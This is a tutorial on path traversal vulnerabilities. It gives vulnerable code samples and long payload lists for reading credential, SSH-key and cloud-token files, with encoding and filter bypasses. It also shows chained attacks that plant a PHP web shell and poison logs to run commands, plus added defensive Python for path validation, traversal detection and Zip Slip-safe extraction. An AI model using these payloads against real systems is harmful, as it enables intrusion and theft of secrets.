Path traversal
Before you start, it is highly recommended to have the basics of file system concepts (absolute vs. relative paths, path separators), operating system permission models, and how web servers and applications map URLs or input values to filesystem resources. This part may seem long; its sections are built to be read sequentially, starting from the beginner level and going up to some advanced material, but feel free to jump to whatever topic you want. Happy hacking :)
Understanding Path Traversal
What is Path Traversal?
Path traversal (also known as directory traversal) is a security vulnerability that allows attackers to access files and directories outside of the intended directory structure. This occurs when applications use user-supplied input to construct file paths without proper validation or sanitization.
Vulnerable Code Example
// PHP vulnerable file reading
$file = $_GET['file'];
$content = file_get_contents('/var/www/html/uploads/' . $file);
echo $content;
Normal Request:
URL:
GET /view.php?file=document.pdf
Path:
/var/www/html/uploads/document.pdf
Malicious Request:
URL:
GET /view.php?file=../../../etc/passwd
Path:
/var/www/html/uploads/../../../etc/passwd → /etc/passwd
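The same file read done safely, as an added example (Python, not the page's PHP and not any project's code): the user-supplied name is joined to the base directory and the resolved result is checked to still lie inside it, which rejects the ../../../etc/passwd request above together with absolute paths, backslash variants and NUL bytes. UPLOAD_BASE mirrors the /var/www/html/uploads directory of the example; the sample inputs are constructed.

```python
import os
import re

# Base directory used by the vulnerable PHP example above.
UPLOAD_BASE = "/var/www/html/uploads"

class PathTraversalError(ValueError):
    """Raised when a user-supplied path would land outside the base directory."""

def resolve_under_base(base: str, user_path: str) -> str:
    """Return the absolute path of user_path inside base, or raise PathTraversalError.

    Containment is checked on the *resolved* path, so '..', './', doubled
    separators and symlinks are all collapsed before the comparison is made.
    """
    if "\x00" in user_path:
        # A NUL byte only serves to cut off an appended extension (passwd%00.txt).
        raise PathTraversalError("NUL byte in path")
    # Treat backslash as a separator on every platform: a name that is harmless on
    # Linux may later reach a Windows component (deliberately conservative).
    normalised = user_path.replace("\\", "/")
    if normalised.startswith("/") or re.match(r"^[A-Za-z]:", normalised):
        # Absolute paths and drive letters have no business in a file parameter.
        # Note: os.path.join(base, "/etc/passwd") silently DROPS base, the same
        # defect the upload-path snippet further down this page has.
        raise PathTraversalError("absolute path supplied")
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, normalised))
    # commonpath() compares whole components, so '/var/www/html/uploads-old'
    # is correctly treated as outside '/var/www/html/uploads'.
    if os.path.commonpath([base_real, target]) != base_real:
        raise PathTraversalError(f"{user_path!r} escapes {base}")
    return target

def is_allowed(base: str, user_path: str) -> bool:
    """True if user_path stays inside base, False otherwise."""
    try:
        resolve_under_base(base, user_path)
        return True
    except PathTraversalError:
        return False

if __name__ == "__main__":
    # Constructed inputs: the normal and malicious requests above plus variants.
    samples = ["document.pdf", "reports/../q1.pdf", "../../../etc/passwd",
               "/etc/passwd", "..\\..\\..\\etc\\passwd", "a/../../b.pdf",
               "passwd\x00.txt", "C:\\windows\\win.ini"]
    for p in samples:
        print(f"{p!r:30} -> {'allowed' if is_allowed(UPLOAD_BASE, p) else 'REJECTED'}")
```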
How Path Traversal Works
Path traversal exploits the way operating systems handle relative path references. By using special directory references like ../ (parent directory) or absolute paths, attackers can navigate outside the intended directory structure to access sensitive files.
Common Path Traversal Sequences
Unix/Linux Systems:
../ - Parent directory
./ - Current directory
/ - Root directory
~ - Home directory
// - Alternative root (some systems)
Windows Systems:
..\ - Parent directory
.\ - Current directory
C:\ - Drive root
\\ - UNC path prefix
/ - Also works on Windows
Impact and Consequences
Sensitive File Access - Reading configuration files, passwords, keys
Source Code Disclosure - Accessing application source code
System Information Gathering - Reading system files, logs
Credential Harvesting - Accessing password files, tokens
Remote Code Execution - In combination with file upload vulnerabilities
Denial of Service - Accessing large files or system resources
Common Vulnerable Scenarios
File Download/View Functionality
Document Viewers:
// Vulnerable document viewer
$doc = $_GET['document'];
readfile('/var/www/docs/' . $doc);
Image Galleries:
// Vulnerable image display
$image = $_GET['img'];
header('Content-Type: image/jpeg');
readfile('/var/www/images/' . $image);
Log File Viewers:
// Vulnerable log viewer
$logfile = $_POST['log'];
echo file_get_contents('/var/log/app/' . $logfile);
File Upload Paths
Upload Directory Specification:
# Vulnerable upload path
import os
from flask import request  # Flask-style request object assumed

upload_dir = request.form['directory']
filename = request.files['file'].filename
# os.path.join() discards '/uploads/' entirely when upload_dir is an absolute path
filepath = os.path.join('/uploads/', upload_dir, filename)
Template File Access:
// Vulnerable template loading
String template = request.getParameter("template");
File templateFile = new File("/app/templates/" + template);
Include/Require Operations
Dynamic File Inclusion:
// Vulnerable include
$page = $_GET['page'];
include('/var/www/pages/' . $page . '.php');
Configuration File Loading:
# Vulnerable config loading
from flask import request  # Flask-style request object assumed

config_file = request.args.get('config')
with open(f'/app/config/{config_file}', 'r') as f:
    config = f.read()
Basic Path Traversal Techniques
Simple Directory Traversal
Basic Dot-Dot-Slash
Linux/Unix Traversal:
# Move up one directory
../etc/passwd
# Move up multiple directories
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
# Access system files
../../../etc/shadow
../../../root/.bash_history
../../../var/log/auth.log
Windows Traversal:
# Windows directory traversal
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\users\administrator\desktop\passwords.txt
Absolute Path Access
Direct Absolute Paths:
# Linux absolute paths
/etc/passwd
/etc/shadow
/root/.ssh/id_rsa
/var/log/apache2/access.log
# Windows absolute paths
C:\windows\system32\drivers\etc\hosts
C:\users\administrator\documents\passwords.txt
C:\inetpub\wwwroot\web.config
Mixed Traversal Techniques
Combining Relative and Absolute:
# Start with relative, end with absolute
../../../etc/passwd
../../../../../../etc/passwd
# Mixed separators (Windows)
../../../windows\system32\drivers\etc\hosts
..\..\..\windows/system32/drivers/etc/hosts
URL Encoding Bypass
Single URL Encoding
Basic URL Encoding:
# Encoded dot-dot-slash
%2e%2e%2f → ../
%2e%2e%5c → ..\
# Full path encoding
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
→ ../../../etc/passwd
# Windows path encoding
%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
→ ..\..\..\windows\system32\drivers\etc\hosts
Double URL Encoding
Double-Encoded Sequences:
# Double encoded dot-dot-slash
%252e%252e%252f → %2e%2e%2f → ../
%252e%252e%255c → %2e%2e%5c → ..\
# Double encoded paths
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
→ %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
→ ../../../etc/passwd
Unicode and UTF-8 Encoding
Unicode Variations:
# Unicode dot representations
\u002e\u002e\u002f → ../
\u002e\u002e\u005c → ..\
# UTF-8 encoded sequences
%c0%ae%c0%ae%c0%af → ../
%c1%9c%c1%9c%c1%af → ../
# Overlong UTF-8 encoding
%e0%80%ae%e0%80%ae%e0%80%af → ../
Filter Evasion Techniques
Null Byte Injection
Null Byte Termination:
# Null byte to bypass extension checks
../../../etc/passwd%00.txt
../../../etc/passwd%00.pdf
../../../etc/passwd\0.jpg
# Multiple null bytes
../../../etc/passwd%00%00.txt
Case Variation
Mixed Case Paths:
# Case variations
../../../ETC/passwd
../../../Etc/Passwd
../../../etc/PASSWD
# Windows case insensitive
..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\Windows\System32\Drivers\Etc\Hosts
Alternative Separators
Different Path Separators:
# Forward slash on Windows
../../../windows/system32/drivers/etc/hosts
# Backslash on Unix (if processed)
..\..\..\etc\passwd
# Mixed separators
../../../windows\system32/drivers\etc/hosts
..\..\..\windows/system32\drivers/etc\hosts
Character Substitution
Alternative Character Representations:
# Backslash variations
.%5c.%5c.%5cetc%5cpasswd
.%2f.%2f.%2fetc%2fpasswd
# Alternative dot representations
%2e%2e/etc/passwd
%2E%2E/etc/passwd
# Space and tab characters
..%20/..%20/..%20/etc/passwd
..%09/..%09/..%09/etc/passwd
Advanced Path Traversal Techniques
Deep Directory Traversal
Excessive Dot-Dot Sequences
Over-Traversal:
# More traversals than needed
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
# Windows over-traversal
..\..\..\..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts
Nested Path Construction
Complex Path Building:
# Nested relative paths
dir1/../dir2/../../../etc/passwd
folder/../subfolder/../../etc/passwd
app/data/../../../etc/passwd
# Mixed absolute and relative
/var/www/../../../etc/passwd
C:\inetpub\..\..\..\windows\system32\drivers\etc\hosts
Application-Specific Bypasses
Framework-Specific Techniques
PHP Path Traversal:
# PHP stream wrappers
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
data://text/plain;base64,Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
# PHP input streams
php://input
php://stdin
Java Path Traversal:
# Java classpath access
../../../WEB-INF/classes/application.properties
../../../WEB-INF/web.xml
../../../META-INF/MANIFEST.MF
# JAR file access
jar:file:../../../app.jar!/config.properties
ASP.NET Path Traversal:
# ASP.NET configuration
../../../web.config
../../../global.asax
../../../bin/application.dll.config
# IIS specific
../../../inetpub/wwwroot/web.config
Operating System Specific
Linux-Specific Paths:
# Process information
../../../proc/self/environ
../../../proc/self/cmdline
../../../proc/version
../../../proc/meminfo
# System configuration
../../../etc/hostname
../../../etc/issue
../../../etc/resolv.conf
../../../etc/hosts
Windows-Specific Paths:
# Windows registry files
..\..\..\windows\system32\config\system
..\..\..\windows\system32\config\software
..\..\..\windows\system32\config\sam
# Windows system information
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\win.ini
..\..\..\windows\system.ini
Filter Bypass Combinations
Multi-Encoding Techniques
Layered Encoding:
# URL + Unicode
%u002e%u002e%u002f → ../
%u002e%u002e%u005c → ..\
# Double URL + Case
%252E%252E%252F → %2E%2E%2F → ../
%252e%252e%252f → %2e%2e%2f → ../
# Triple encoding
%25252e%25252e%25252f → %252e%252e%252f → %2e%2e%2f → ../
Whitespace and Special Characters
Whitespace Injection:
# Spaces in paths
../ ../../../etc/passwd
..%20/..%20/..%20/etc/passwd
# Tab characters
..%09/..%09/..%09/etc/passwd
# Newlines and carriage returns
..%0a/..%0a/..%0a/etc/passwd
..%0d/..%0d/..%0d/etc/passwd
Path Normalization Bypass
Path Segment Manipulation:
# Redundant path segments
./../../etc/passwd
.././../etc/passwd
..//../../etc/passwd
# Self-referencing paths
./../.././../etc/passwd
././../../etc/passwd
Platform-Specific Exploitation
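Before turning to platform-specific targets: every sequence catalogued in the URL Encoding Bypass, Filter Evasion Techniques and Filter Bypass Combinations sections above has to be undone before a filter or log scanner can judge a path. The following is an added example (Python, not from the original page) of that canonicalisation: it strips %-encoding for up to three rounds, maps the %uXXXX and overlong UTF-8 forms listed above to the characters they stand for, truncates at the first NUL, unifies separators and whitespace padding, and then checks whether the result climbs above its base directory. MAX_DECODE_ROUNDS and the raw query-string splitting are assumptions; the inputs in the test are constructed.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # covers the single, double and triple encodings listed above

# Overlong UTF-8 forms listed on this page and the ASCII byte each one stands for.
# unquote() would turn them into U+FFFD, so they are mapped before it runs.
_OVERLONG = {"%c0%ae": ".", "%e0%80%ae": ".", "%c0%af": "/", "%e0%80%af": "/", "%c1%9c": "\\"}

def canonicalise(raw: str) -> str:
    """Peel off the layered encodings from the sections above (for detection, not file access)."""
    s = raw
    for _ in range(MAX_DECODE_ROUNDS):
        # %u002e (IIS style) and literal \u002e are not understood by unquote().
        s = re.sub(r"(?:%|\\)u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
        for seq, ch in _OVERLONG.items():
            s = re.sub(re.escape(seq), lambda _, c=ch: c, s, flags=re.IGNORECASE)
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.split("\x00", 1)[0]            # what a C runtime sees after %00 truncation
    s = s.replace("\\", "/")             # Windows and mixed separators
    s = re.sub(r"[ \t\r\n]+", "", s)     # "..%20/" and "..%09/" padding
    return re.sub(r"/{2,}", "/", s)      # "..//../" redundant separators

def escapes_base(raw: str) -> bool:
    """True if the canonical path is absolute or climbs above the directory it is joined to."""
    path = canonicalise(raw)
    if path.startswith("/") or re.match(r"^[A-Za-z]:", path):
        return True
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def flag_query(query: str) -> list:
    """Return (parameter, canonical_path) for every raw query-string parameter that escapes."""
    hits = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")  # keep it raw: all decoding happens in canonicalise()
        if escapes_base(value):
            hits.append((unquote(name), canonicalise(value)))
    return hits
```

Run flag_query() over the query-string part of each access-log line; a legitimate document name never needs a ".." segment, so every hit is worth an alert.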
Linux/Unix Systems
System File Access
Password and Authentication:
# User account information
../../../etc/passwd
../../../etc/shadow
../../../etc/group
../../../etc/sudoers
# SSH keys and configuration
../../../root/.ssh/id_rsa
../../../root/.ssh/authorized_keys
../../../etc/ssh/sshd_config
../../../home/user/.ssh/id_rsa
System Configuration:
# Network configuration
../../../etc/hosts
../../../etc/resolv.conf
../../../etc/network/interfaces
../../../etc/hostname
# System information
../../../proc/version
../../../proc/cpuinfo
../../../proc/meminfo
../../../etc/issue
../../../etc/os-release
Log Files:
# System logs
../../../var/log/syslog
../../../var/log/auth.log
../../../var/log/daemon.log
../../../var/log/kern.log
# Application logs
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/mysql/error.log
Application Files
Web Server Configuration:
# Apache configuration
../../../etc/apache2/apache2.conf
../../../etc/apache2/sites-enabled/000-default
../../../etc/httpd/conf/httpd.conf
# Nginx configuration
../../../etc/nginx/nginx.conf
../../../etc/nginx/sites-enabled/default
Database Configuration:
# MySQL configuration
../../../etc/mysql/my.cnf
../../../var/lib/mysql/mysql/user.MYD
# PostgreSQL configuration
../../../etc/postgresql/postgresql.conf
../../../var/lib/postgresql/data/pg_hba.conf
Windows Systems
System File Access
System Configuration:
# Windows system files
..\..\..\windows\win.ini
..\..\..\windows\system.ini
..\..\..\windows\system32\drivers\etc\hosts
# Registry files
..\..\..\windows\system32\config\system
..\..\..\windows\system32\config\software
..\..\..\windows\system32\config\sam
User Data:
# User profiles
..\..\..\users\administrator\desktop\passwords.txt
..\..\..\users\administrator\documents\database.mdb
..\..\..\users\administrator\appdata\roaming\application\config.ini
# Application data
..\..\..\programdata\application\config.xml
..\..\..\program files\application\config\database.conf
IIS and ASP.NET Files
IIS Configuration:
# IIS configuration
..\..\..\inetpub\wwwroot\web.config
..\..\..\windows\system32\inetsrv\config\applicationhost.config
# ASP.NET files
..\..\..\inetpub\wwwroot\bin\application.dll.config
..\..\..\inetpub\wwwroot\global.asax
..\..\..\inetpub\wwwroot\app_data\database.mdf
Windows Services:
# Service configuration
..\..\..\windows\system32\config\software
..\..\..\program files\service\config.xml
..\..\..\programdata\service\settings.ini
Web Application Context Exploitation
File Download Vulnerabilities
Document Management Systems
Download Endpoint Exploitation:
# Document download
GET /download?file=../../../etc/passwd
GET /document/view?path=../../../etc/shadow
POST /file/get
Content-Type: application/x-www-form-urlencoded
filename=../../../var/log/auth.log
PDF/Document Viewers:
# PDF viewer exploitation
GET /pdf/view?document=../../../etc/passwd
GET /doc/display?file=../../../root/.ssh/id_rsa
GET /report/generate?template=../../../etc/mysql/my.cnf
Image and Media Galleries
Image Gallery Exploitation:
# Image viewer
GET /gallery/image?file=../../../etc/passwd
GET /media/view?img=../../../var/log/apache2/access.log
# Thumbnail generation
GET /thumb/generate?image=../../../etc/shadow
POST /image/resize
Content-Type: application/json
{"image": "../../../root/.bash_history"}File Upload Vulnerabilities
Upload Path Manipulation
Directory Traversal in Upload:
# Upload to arbitrary location
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="../../../var/www/html/shell.php"
Content-Type: application/x-php
<?php system($_GET['cmd']); ?>
------WebKitFormBoundary--
ZIP File Extraction (Zip Slip):
# Malicious ZIP with path traversal
# Create ZIP with entry: ../../../var/www/html/backdoor.php
# When extracted, places file outside intended directory
Template and Include Vulnerabilities
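Before moving on to template inclusion, here is how an extractor closes the Zip Slip hole just described. This is an added example (Python, not from the original page or any project): every entry name is resolved against the destination directory and the archive is refused as a whole if any entry lands outside it. CPython's zipfile already sanitises names on extraction; the explicit pre-check makes the policy visible and rejects the archive instead of silently relocating entries, which is the behaviour to want from any extractor. The destination path and the sample archives built by make_zip() are constructed.

```python
import io
import os
import zipfile

class ZipSlipError(ValueError):
    """Raised when an archive entry would be written outside the extraction directory."""

def vet_entries(zip_bytes: bytes, dest_dir: str) -> list:
    """Return the entry names that resolve outside dest_dir (an empty list means the archive is clean)."""
    dest_real = os.path.realpath(dest_dir)
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            # Backslashes count as separators: archives produced on Windows contain them.
            # An absolute entry name makes os.path.join() drop dest_real, so it is caught too.
            candidate = os.path.join(dest_real, name.replace("\\", "/"))
            if os.path.commonpath([dest_real, os.path.realpath(candidate)]) != dest_real:
                bad.append(name)
    return bad

def safe_extract(zip_bytes: bytes, dest_dir: str) -> list:
    """Extract only if *every* entry stays inside dest_dir; a hostile archive writes nothing."""
    bad = vet_entries(zip_bytes, dest_dir)
    if bad:
        raise ZipSlipError(f"refusing archive, entries escape {dest_dir}: {bad}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest_dir)
        return zf.namelist()

def make_zip(entries: dict) -> bytes:
    """Build an in-memory ZIP from {entry_name: bytes}; only used to construct sample archives."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

if __name__ == "__main__":
    # Constructed archives: a clean one and one carrying the traversal entry described above.
    clean = make_zip({"docs/readme.txt": b"hello"})
    hostile = make_zip({"docs/readme.txt": b"hello",
                        "../../../var/www/html/backdoor.php": b"placeholder"})
    for label, blob in (("clean", clean), ("hostile", hostile)):
        print(label, "->", vet_entries(blob, "/srv/app/extract") or "all entries contained")
```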
Template Engine Exploitation
Template Path Traversal:
# Template inclusion
GET /render?template=../../../etc/passwd
POST /template/process
Content-Type: application/json
{
"template": "../../../var/log/auth.log",
"data": {"user": "admin"}
}
Server-Side Include (SSI):
# SSI file inclusion
GET /page.shtml?include=../../../etc/passwd
GET /template.html?file=../../../proc/version
Advanced Exploitation Scenarios
Chained Attacks
Path Traversal to RCE
File Upload + Path Traversal:
# Step 1: Upload malicious file
POST /upload
filename=shell.php
content=<?php system($_GET['c']); ?>
# Step 2: Access via path traversal
GET /view?file=../uploads/shell.php&c=whoami
Log Poisoning + Path Traversal:
# Step 1: Poison log file via User-Agent
GET / HTTP/1.1
User-Agent: <?php system($_GET['cmd']); ?>
# Step 2: Include log file
GET /view?file=../../../var/log/apache2/access.log&cmd=id
Information Gathering Chain
Configuration Discovery:
# Step 1: Find application type
GET /view?file=../../../etc/issue
# Step 2: Target specific configs
GET /view?file=../../../etc/apache2/sites-enabled/000-default
# Step 3: Extract database credentials
GET /view?file=../../../var/www/html/config.php
# Step 4: Access database files
GET /view?file=../../../var/lib/mysql/mysql/user.MYD
Container and Cloud Exploitation
Docker Container Escape
Container File Access:
# Container metadata
../../../proc/self/cgroup
../../../proc/self/mountinfo
# Docker socket access
../../../var/run/docker.sock
# Host filesystem access (if mounted)
../../../host/etc/passwd
../../../host/root/.ssh/id_rsa
Kubernetes Pod Escape
Service Account Access:
# Service account token
../../../var/run/secrets/kubernetes.io/serviceaccount/token
# Kubernetes API access
../../../var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Pod metadata
../../../proc/self/environ
Cloud Metadata Access
AWS Instance Metadata:
# Via SSRF through path traversal
GET /proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Local file with cloud credentials
../../../home/ec2-user/.aws/credentials
../../../root/.aws/config
Language and Framework Specific
PHP Applications
PHP-Specific Vulnerabilities
PHP Stream Wrappers:
# PHP filter wrapper
php://filter/convert.base64-encode/resource=../../../etc/passwd
# PHP input wrapper
php://input
# Data wrapper
data://text/plain;base64,Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
# Expect wrapper (if enabled)
expect://whoami
Include/Require Exploitation:
// Vulnerable PHP include
<?php
$page = $_GET['page'];
include($page . '.php');
?>
// Exploitation
GET /index.php?page=../../../etc/passwd%00
GET /index.php?page=php://filter/convert.base64-encode/resource=config
PHP Configuration Files
Common PHP Targets:
# PHP configuration
../../../etc/php/7.4/apache2/php.ini
../../../usr/local/etc/php/php.ini
# Application configs
../../../var/www/html/wp-config.php
../../../var/www/html/config.php
../../../var/www/html/.env
Java Applications
Java-Specific Paths
Java Application Files:
# Spring Boot configuration
../../../application.properties
../../../application.yml
../../../config/application.properties
# Web application files
../../../WEB-INF/web.xml
../../../WEB-INF/classes/application.properties
../../../META-INF/MANIFEST.MF
Class Path Traversal:
# Java class files
../../../WEB-INF/classes/com/company/app/Config.class
../../../WEB-INF/lib/application.jar
# Log4j configuration
../../../WEB-INF/classes/log4j.properties
../../../WEB-INF/classes/log4j2.xml
Python Applications
Python-Specific Files
Python Application Files:
# Python configuration
../../../settings.py
../../../config.py
../../../requirements.txt
# Django specific
../../../manage.py
../../../settings/local.py
../../../static/admin/
# Flask specific
../../../app.py
../../../config/development.py
Python Virtual Environments
Virtual Environment Access:
# Virtual environment files
../../../venv/pyvenv.cfg
../../../env/lib/python3.8/site-packages/
# Python cache files
../../../__pycache__/settings.cpython-38.pyc
Node.js Applications
Node.js Specific Files
Node.js Configuration:
# Package and configuration files
../../../package.json
../../../package-lock.json
../../../.env
../../../config/default.json
# Node modules
../../../node_modules/express/package.json
../../../node_modules/.bin/
Process and Environment:
# Process information
../../../proc/self/environ
../../../proc/self/cmdline
# Node.js specific
../../../.npmrc
../../../yarn.lock